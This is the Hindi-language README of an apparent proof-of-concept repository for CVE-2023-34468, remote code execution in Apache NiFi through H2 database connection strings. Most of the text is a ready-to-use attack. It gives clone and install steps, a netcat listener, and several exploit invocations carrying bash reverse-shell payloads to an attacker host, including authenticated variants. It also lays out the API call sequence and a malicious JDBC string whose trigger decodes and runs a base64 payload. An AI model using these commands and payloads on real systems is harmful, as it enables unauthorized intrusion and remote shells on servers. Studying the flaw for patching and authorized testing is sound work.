
CVE-2023-34468 - Apache NiFi H2 RCE PoC
यह रिपॉज़िटरी CVE-2023-34468 के लिए एक Python-आधारित एक्सप्लॉइट टूल प्रदान करती है, जो Apache NiFi संस्करण 0.0.2 से 1.21.0 में एक गंभीर रिमोट कोड एक्ज़ीक्यूशन भेद्यता (CVSS 9.8) है। यह प्रमाणित उपयोगकर्ताओं को एम्बेडेड ट्रिगर्स के साथ H2 डेटाबेस कनेक्शन स्ट्रिंग्स में हेरफेर करके मनमाना कोड निष्पादित करने की अनुमति देता है।
⚠️ चेतावनी: केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।
requests लाइब्रेरीnc -lnvp 5555)git clone https://github.com/Jeanpt/CVE-2023-34468.git
cd CVE-2023-34468
pip install -r requirements.txt
# अपना लिसनर शुरू करें
nc -lnvp 5555
# एक्सप्लॉइट चलाएँ — auth स्वतः-पता लगाया जाता है, खुले इंस्टेंस के लिए कोई फ्लैग आवश्यक नहीं
python3 exploit.py \
-t http://nifi.target.com:8080 \
-c "bash -i >& /dev/tcp/ATTACKER_IP/5555 0>&1" \
-lh ATTACKER_IP \
-lp 5555
python3 exploit.py \
-t https://nifi.target.com:8443 \
-c "bash -i >& /dev/tcp/ATTACKER_IP/5555 0>&1" \
-lh ATTACKER_IP \
-lp 5555 \
-u admin -p password123
python3 exploit.py \
-t https://nifi.target.com:8443 \
-c "bash -i >& /dev/tcp/ATTACKER_IP/5555 0>&1" \
-lh ATTACKER_IP \
-lp 5555 \
--token <your_bearer_token>
python3 exploit.py -t http://target:8080 -c "..." -lh ATTACKER_IP -lp 5555 --no-cleanup
python3 exploit.py --help
सत्यापन: रिवर्स शेल कनेक्शन के लिए अपना लिसनर जाँचें। कोड निष्पादन की पुष्टि के लिए id चलाएँ।
/nifi-api/system-diagnostics के माध्यम से NiFi संस्करण की पहचान करें/nifi-api/process-groups/root/controller-services पर दुर्भावनापूर्ण H2 कनेक्शन स्ट्रिंग POST करेंENABLED के साथ /nifi-api/controller-services/{id}/run-status पर PUT करेंRUNNING के साथ /nifi-api/processors/{id}/run-status पर PUT करें — कनेक्शन पर H2 ट्रिगर सक्रिय होता हैjdbc:h2:file:/tmp/{random_db}.db;TRACE_LEVEL_SYSTEM_OUT=0\;CREATE TRIGGER {random_name}
BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript
java.lang.Runtime.getRuntime().exec('bash -c {echo,BASE64_PAYLOAD}|{base64,-d}|{bash,-i}')
$$--=x
मुख्य बिंदु:
\;BEFORE SELECT ON INFORMATION_SCHEMA.TABLES पर सक्रिय होता है (स्वतः-ट्रिगर्ड)# एक्सप्लॉइट सीधे चलाएँ
python3 exploit.py -t http://target:8080 -c "bash -i >& /dev/tcp/10.10.16.46/5555 0>&1" -lh 10.10.16.46 -lp 5555
python3 exploit.py -t http://target:8080 -c "touch /tmp/pwned" -lh 127.0.0.1 -lp 5555
यह टूल केवल सुरक्षा अनुसंधान और अधिकृत परीक्षण के लिए प्रदान किया गया है। लेखक इस एक्सप्लॉइट के दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है। केवल अधिकृत वातावरण में ही ज़िम्मेदारी से परीक्षण करें।
MIT लाइसेंस - विवरण के लिए LICENSE फ़ाइल देखें
सुरक्षा अनुसंधान और अधिकृत पेनेट्रेशन परीक्षण के लिए निर्मित।
Topics: apache-nifi h2-database rce exploit cve-2023-34468 python security-research
| कमांड | विवरण |
|---|
-t, --target | लक्षित NiFi इंस्टेंस URL (आवश्यक) |
-c, --command | निष्पादित करने हेतु कमांड (आवश्यक) |
-lh, --lhost | कॉलबैक के लिए लिसनर होस्ट (आवश्यक) |
-lp, --lport | कॉलबैक के लिए लिसनर पोर्ट (आवश्यक) |
-u, --username | NiFi यूज़रनेम (प्रमाणित इंस्टेंस) |
-p, --password | NiFi पासवर्ड (प्रमाणित इंस्टेंस) |
--token | बियरर टोकन (प्रमाणित इंस्टेंस) |
--no-cleanup | एक्सप्लॉइटेशन के बाद क्लीनअप छोड़ें |
--delay | क्लीनअप से पहले प्रतीक्षा हेतु सेकंड (डिफ़ॉल्ट: 10) |
--driver-path | H2 ड्राइवर jar पथ ओवरराइड करें (डिफ़ॉल्ट रूप से छोड़ा गया) |